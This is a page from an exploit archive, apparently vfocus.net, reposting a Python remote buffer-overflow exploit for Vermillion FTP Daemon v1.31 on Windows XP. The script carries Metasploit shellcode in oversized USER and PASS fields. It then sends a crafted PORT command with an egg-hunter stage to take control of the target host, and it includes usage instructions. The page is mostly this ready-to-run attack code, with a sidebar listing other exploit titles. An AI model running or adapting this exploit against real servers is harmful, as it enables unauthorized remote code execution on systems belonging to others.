Vermillion FTP Deamon v1.31 Remote BOF Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Vermillion FTP Deamon v1.31 Remote BOF Exploit

来源：vfocus.net 作者：Dz_attacker 发布时间：2010-02-01

# Exploit Title: Vermillion FTP Deamon Remote BOF Exploit
# Date: 29/01/2010
# Author: Dz_attacker
# Software Link: http://www.softsea.com/download/Vermillion-FTP-Daemon.html
# Version: 1.31
# Tested on: Windows xp sp3
# Code :

#!/usr/bin/python

#[+] Original : http://www.global-evolution.info/news/files/vftpd/vftpd.txt

import socket
import sys
import time

if (len(sys.argv) != 2):
print "+++++++++++++++++++++++++++++++++++++++++++++++++"
print "[+] Vftpd Remote BOF Exploit"
print "[+] Exploit By Dz_attacker (dz_attacker@hotmail.fr)"
print "[+] Usage : %s <target_ip>" %sys.argv[0]
print "+++++++++++++++++++++++++++++++++++++++++++++++++\n"
sys.exit(0)

# win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x44\x5a\x32\x37\x44\x5a\x32\x37\x90\x90\x90\x90\x90\x90\x90\x90"
"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc1"
"\xbc\xec\x76\x83\xeb\xfc\xe2\xf4\x3d\x54\xa8\x76\xc1\xbc\x67\x33"
"\xfd\x37\x90\x73\xb9\xbd\x03\xfd\x8e\xa4\x67\x29\xe1\xbd\x07\x3f"
"\x4a\x88\x67\x77\x2f\x8d\x2c\xef\x6d\x38\x2c\x02\xc6\x7d\x26\x7b"
"\xc0\x7e\x07\x82\xfa\xe8\xc8\x72\xb4\x59\x67\x29\xe5\xbd\x07\x10"
"\x4a\xb0\xa7\xfd\x9e\xa0\xed\x9d\x4a\xa0\x67\x77\x2a\x35\xb0\x52"
"\xc5\x7f\xdd\xb6\xa5\x37\xac\x46\x44\x7c\x94\x7a\x4a\xfc\xe0\xfd"
"\xb1\xa0\x41\xfd\xa9\xb4\x07\x7f\x4a\x3c\x5c\x76\xc1\xbc\x67\x1e"
"\xfd\xe3\xdd\x80\xa1\xea\x65\x8e\x42\x7c\x97\x26\xa9\xc2\x34\x94"
"\xb2\xd4\x74\x88\x4b\xb2\xbb\x89\x26\xdf\x8d\x1a\xa2\xbc\xec\x76")

stage = "92060006,92080001,92120010,92150015,92000015,92040002,"
stage += "92050002,92060010,92000002,92050008,92120013,92020014,"
stage += "92030012,92000005,92050010,92070004,92140015,92110008,"
stage += "92040004,92050010,92030002,92030007,92080011,92150010,"
stage += "92100015,92070005,92140010,92100015,92070005,92140007,"
stage += "92150015,92140007,"

payload = shellcode + "\x44"*(500-len(shellcode))

buffer = "92040001,"*11
buffer += stage
buffer += "92020004,"
buffer += "92150011,"
buffer += "92010002,"
buffer += "92000000,"
buffer += "92020013,"
buffer += "92070000,"
buffer += "92040002,"
buffer += "92000000,"
buffer += "2"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((sys.argv[1],21))
print "[x] Sending Shellcode..."
s.recv(1024)
s.send('USER '+payload+'\r\n')
s.recv(1024)
s.send('PASS '+payload+'\r\n')
s.recv(1024)
s.send('SYST\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.recv(1024)
s.close()

time.sleep(2)

s2=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((sys.argv[1],21))
print "[x] Sending Exploit..."
s2.send('PORT '+buffer+'\r\n')
s2.close()
time.sleep(2)
print "[x] Hunting the shellcode..."
time.sleep(3)
raw_input("[x] Done, press enter to quit")

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告